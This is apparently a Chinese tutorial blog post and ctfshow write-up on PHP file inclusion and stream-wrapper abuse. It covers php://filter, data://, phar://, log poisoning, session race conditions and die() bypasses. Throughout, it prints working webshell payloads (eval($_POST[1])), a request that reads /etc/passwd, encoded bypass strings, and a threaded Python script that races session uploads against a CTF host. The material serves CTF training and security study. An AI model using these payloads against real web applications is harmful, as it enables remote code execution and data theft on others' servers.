文件包含漏洞+php伪协议

常见的文件包含函数

php文件包含函数有下面四种

  • include()
  • require()
  • include_once()
  • require_once()
    include与require基本相同,只是一些错误处理不同
  1. include:遇到错误只发出警告,不会出现停止
  2. require:遇到错误要停止
  3. include_once和require_once:只包含一次

基本绕过:

利用php伪协议

1.php://input

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容,从而导致任意代码执行。
CTF中经常使用file_get_contents()获取php://input内容(POST)
需要allow_url_include打开
在这里插入图片描述
当enctype="multipart/form-data"的时候 php://input` 是无效的
例子一

2.php://filter

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致 任意文件读取。
在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用

参数详解

resource=<要过滤的数据流>     这个参数是必须的。它指定了你要筛选过滤的数据流。(相对路径也可)
read=<读链的筛选列表>         该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表>    该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

过滤器

读取文件源码可以直接用resource读取(常用)
php://filter/convert.base64-encode/resource=flag.php	base64编码 ---最常用的
php://filter/convert.quoted-printable-encode/resource=flag.php quoted-printable编码
php://filter/string.rot13/resource=flag.php rot13变换
字符串过滤器作用
string.rot13等同于str_rot13(),rot13变换
string.toupper等同于strtoupper(),转大写字母
string.tolower等同于strtolower(),转小写字母
string.strip_tags等同于strip_tags(),去除html、PHP语言标签
转换过滤器作用
convert.base64-encode & convert.base64-decode等同于base64_encode()base64_decode(),base64编码解码
convert.quoted-printable-encode & convert.quoted-printable-decodequoted-printable 字符串与 8-bit 字符串编码解码
压缩过滤器作用
zlib.deflate & zlib.inflate在本地文件系统中创建 gzip 兼容文件的方法,但不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。
bzip2.compress & bzip2.decompress同上,在本地文件系统中创建 bz2 兼容文件的方法。
加密过滤器作用
mcrypt.*libmcrypt 对称加密算法
mdecrypt.*libmcrypt 对称解密算法文件的打开方式
3.data协议

data协议类似于php://input协议,用于控制输出流,当与包含函数结合时,data://流回被当作php文件执行。从而导致任意代码的执行。
当php被过滤时,就可以适当选择data协议
需满足allow_url_fopen,allow_url_include同时开启才能使用
例如:

?file=data://,<php phpinfo();
?file=data://text/plain,<?php phpinfo();---恶意代码
?file=data://text/plain;base64,base编码内容(恶意代码的base64编码)

注意:使用data协议,后面php代码不要闭合。

4.zip协议

zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。从而实现任意代码执行。

  1. zip://中只能传入绝对路径。
  2. 要用#分隔压缩包和压缩包里的内容,并且#要用url编码%23(即下述POC中#要用%23替换)
  3. 只需要是zip的压缩包即可,后缀名可以任意更改。
    在这里插入图片描述

5.bzip2://协议

绝对路径和相对路径都可以使用
在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用

file.php?file=compress.bzip2://nac.bz2
file.php?file=compress.bzip2://./nac.jpg
file.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg

6.zlib://协议

同上
在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用

file.php?file=compress.zlib://file.gz
file.php?file=compress.zlib://./nac.jpg
file.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg

7. phar://协议

phar:// 有点类似zip://同样可以导致 任意代码执行。

区别就是:phar://中相对路径和绝对路径都可以使用
在这里插入图片描述
phar://:PHP 归档,常常跟文件包含,文件上传结合着考察。当文件上传仅仅校验mime类型与文件后缀,可以通过以下命令进行利用
例子

nac.php(木马)->压缩->nac.zip->改后缀->nac.jpg->上传->phar://nac.jpg/nac.php
从而绕过。

8.file协议

用于访问本地文件系统,并且不受allow_url_fopen,allow_url_include的影响
file协议可以访问文件的绝对路径,相对路径
file://还经常和curl函数(SSRF)结合在一起
如:?file=file:///etc/passwd,有三条斜杠
例子1
例子2

总结

在这里插入图片描述

日志包含

介绍

WEB服务器一般会将用户的访问记录保存在访问日志中。那么我们可以根据日志记录的内容,精心构造请求,把PHP代码插入到日志文件中,通过文件包含漏洞来执行日志中的PHP代码。

利用条件
  • 对日志文件可读取
  • 知道日志文件的存储目录,一般可以通过phpinfo(),来读取日志文件
    在这里插入图片描述
漏洞利用流程
原理
如果访问一个不存在的资源时,如http://www.xxxx.com/<?php phpinfo(); ?>,则会记录在日志中,一般
我们是把恶意代码写入UA头里。但是代码中的敏感字符会被浏览器转码,我们可以通过burpsuit绕过
编码,就可以把<?php phpinfo(); ?> 写入apache,iis或者nginx的日志文件,然后可以通过包含日志文件来执行此代码,但前提是你得知道中间件日志文件的存储路径。
流程:
先刷新网页或者上传文件抓包,改UA头为恶意代码,<?php eval($_POST[1]);?>,<?php system("tac ../f*");>,
然后访问日志文件,执行恶意代码
日志文件路径
一)日志默认路径
(1) apache+Linux日志默认路径
        /etc/httpd/logs/access_log
或者
        /var/log/httpd/access_log
(2) apache+win2003日志默认路径
        D:\xampp\apache\logs\access.log
        D:\xampp\apache\logs\error.log
(3) IIS6.0+win2003默认日志文件
        C:\WINDOWS\system32\Logfiles
(4) IIS7.0+win2003 默认日志文件
        %SystemDrive%\inetpub\logs\LogFiles
(5) nginx 日志文件
        日志文件在用户安装目录logs目录下
                以我的安装路径为例/usr/local/nginx,
                那我的日志目录就是在/usr/local/nginx/logs里
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
二)web中间件默认配置
(1) apache+linux 默认配置文件
        /etc/httpd/conf/httpd.conf
或者
         index.php?page=/etc/init.d/httpd
(2) IIS6.0+win2003 配置文件
        C:/Windows/system32/inetsrv/metabase.xml
(3) IIS7.0+WIN 配置文件
        C:\Windows\System32\inetsrv\config\applicationHost.config

一般来说,Apache,nginx运行后一般默认会生成两个日志文件,Windos下是access.log(访问日志)和error.log(错误日志),Linux下是access_log和error_log,访问日志文件记录了客户端的每次请求和服务器响应的相关信息。

远程文件包含

条件

php配置的allow_url_include = on必须为on(开启),可以在phpinfo里看

流程

使用file=http://xxx.xxx/shell.txt
包含后利用恶意代码

PHPSESSION包含

上一篇文章有

包含/proc/self/environ文件

proc/self/environ中会保存user-agent头,如果在user-agent中插入php代码,则php代码会被写入到environ中,之后再包含它,即可。
利用条件:
php以cgi方式运行,这样environ才会保持UA头。
environ文件存储位置已知,且environ文件可读。
参考:
https://blog.csdn.net/god_7z1/article/details/7904789

包含临时文件

过程

在这里插入图片描述
php中上传文件,会创建临时文件。在linux下使用/tmp目录,而在windows下使用c:\winsdows\temp目录。在代码执行结束后,临时文件会被删除。在临时文件被删除之前,利用条件竞争即可包含该临时文件

由于包含需要知道包含的文件名。一种方法是进行暴力猜解,linux下使用的随机函数有缺陷,而window下只有65535中不同的文件名,所以这个方法是可行的。

另一种方法是配合phpinfo页面的php variables,可以直接获取到上传文件的存储路径和临时文件名,直接包含即可。

类似利用临时文件的存在,竞争时间去包含的,可以看看这道CTF题:
CTF题

包含上传文件

很多网站通常会提供文件上传功能,比如:上传头像、文档等,这时就可以采取上传一句话图片木马的方式进行包含。

图片马的制作方式如下,在cmd控制台下输入:

  1. 进入1.jph和2.php的文件目录后,执行:

  2. copy 1.jpg/b+2.php/a 3.jpg

  3. 将图片1.jpg和包含php代码的2.php文件合并生成图片马3.jpg

假设已经上传一句话图片木马到服务器,路径为/upload/201811.jpg
图片代码如下:

<?fputs(fopen("shell.php","w"),"<?php eval($_POST['pass']);?>")?>

然后访问URL:http://www.xxxx.com/index.php?page=./upload/201811.jpg,包含这张图片,将会在index.php所在的目录下生成shell.php

绕过类型

指定后缀绕过

测试代码

<?php
	error_reporting(0);
	$file = $_GET["file"];
	//后缀
	include $file.".txt";

	highlight_file(__FILE__);
?>

利用长度截断

利用条件:
php版本 < php 5.2.8

原理:
Windows下目录最大长度为256字节,超出的部分会被丢弃
Linux下目录最大长度为4096字节,超出的部分会被丢弃。

利用方法:
只需要不断的重复 ./(Windows系统下也可以直接用 . 截断)
  ?file=./././。。。省略。。。././shell.php
则指定的后缀.txt会在达到最大值后会被直接丢弃掉

%00截断

利用条件:
magic_quotes_gpc = Off
php版本 < php 5.3.4

利用方法:
直接在文件名的最后加上%00来截断指定的后缀名
  ?file=shell.php%00

url

url格式:

protocol :// hostname[:port] / path / [;parameters][?query]#fragment

远程文件包含中,可以使用URL的query和fragment
参考文献
https://blog.csdn.net/qq_42181428/article/details/87090539

指定前缀截断

目录遍历

测试代码

<?php
	error_reporting(0);
	$file = $_GET["file"];
	//前缀
	include "/var/www/html/".$file;

	highlight_file(__FILE__);
?>

使用…/…/…/等即可遍历

编码

如果…/被过滤了,可以用

1. url编码
- %2e%2e%2f
- ..%2f
- %2e%2e/
2. 二次编码
- %252e%252e%252f
3. 容器和服务器编码
- ..%c0%af

ctfshow

web78

filter伪协议
payload
file=php://filter/convert.base64-encode/resource=flag.php
解码后得到flag

web79

替换了php,我们使用data协议
file=data://text/plain,<?=`tac f*`;?>

web80

过滤了php和data
我们可以使用远程文件包含(需要allow_url_include=on)

web81

日志文件包含
首先在UA头里面写入一句话

<?php
eval($_POST[1]);
?>

接着包含日志文件并利用一句话

GET:file=/var/log/nginx/access.log
POST:1=phpinfo();

web82-86

php-session文件包含

import requests
import threading
import sys
session=requests.session()
sess='yu22x'
url1="http://05b536c9-c839-4df4-80a9-ddbc1ddeb979.challenge.ctf.show:8080/"
url2='http://05b536c9-c839-4df4-80a9-ddbc1ddeb979.challenge.ctf.show:8080?file=/tmp/sess_'+sess
data1={
	'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
}
data2={
	'1':'system("cat f*");'
}
file={
	'file':'abc'
}
cookies={
	'PHPSESSID': sess
}
def write():
	while True:
		r = session.post(url1,data=data1,files=file,cookies=cookies)
def read():
	while True:
		r = session.post(url2,data=data2)
		if 'ctfshow{' in r.text:
			print(r.text)
threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()

web87

代码

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
    highlight_file(__FILE__);
}

死亡绕过die
file参数过滤了太多东西,文件名可以通过两次url全编码绕过。
因为前面有die,所以我们后面直接写php内容会起不到作用,利用编码
1.base64编码

GET
file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2577%2572%2569%2574%2565%253d%2563%256f%256e%2576%2565%2572%2574%252e%2562%2561%2573%2565%2536%2534%252d%2564%2565%2563%256f%2564%2565%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%2561%252e%2570%2568%2570
// file=php://filter/write=convert.base64-decode/resource=a.php
POST
content=11PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==
其中PD9waHAgZXZhbCgkX1BPU1RbMV0pOw=="<?php eval($_POST[1]);"的base64编码。前面的11是为了填充"<?php die('大佬别秀了');?>"
base64 44位解码,其中"<?php die('大佬别秀了');?>"解码的内容其实只有phpdie,所以需要再填充两位。
//content=<?php eval($_POST[1]);

2.rot13编码

GET
file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2577%2572%2569%2574%2565%253d%2573%2574%2572%2569%256e%2567%252e%2572%256f%2574%2531%2533%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%2562%252e%2570%2568%2570
//file=php://filter/read=string.rot13/resource=b.php
POST
content=<?cuc riny($_CBFG[1]);
//content=<?php eval($_POST[1]);

web117

代码

function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

题目中过滤了很多协议和编码方式,但是除了我们常用的base64和rot13还是有很多方法可以绕过die的
更多编码方式
这是取一个 UCS-2LE UCS-2BE

payload:
file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post:contents=?<hp pvela$(P_SO[T]1;)>?

可以测试下面代码

echo iconv("UCS-2LE","UCS-2BE",'<?php die();?>?<hp pvela$(P_SO[T]1;)>?');

输出如下,使得die失效,并且我们的一句话木马可以使用
?<hp pid(e;)>?<?php eval($_POST[1]);?>

参考文献

  1. https://blog.csdn.net/qq_42181428/article/details/87090539(重点)
  2. https://www.freebuf.com/articles/web/277756.html
  3. https://blog.csdn.net/miuzzx/article/details/116205407
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值